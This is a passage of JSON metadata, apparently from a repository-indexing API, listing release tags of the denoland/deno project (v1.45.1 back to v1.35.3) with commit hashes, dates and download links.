d":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T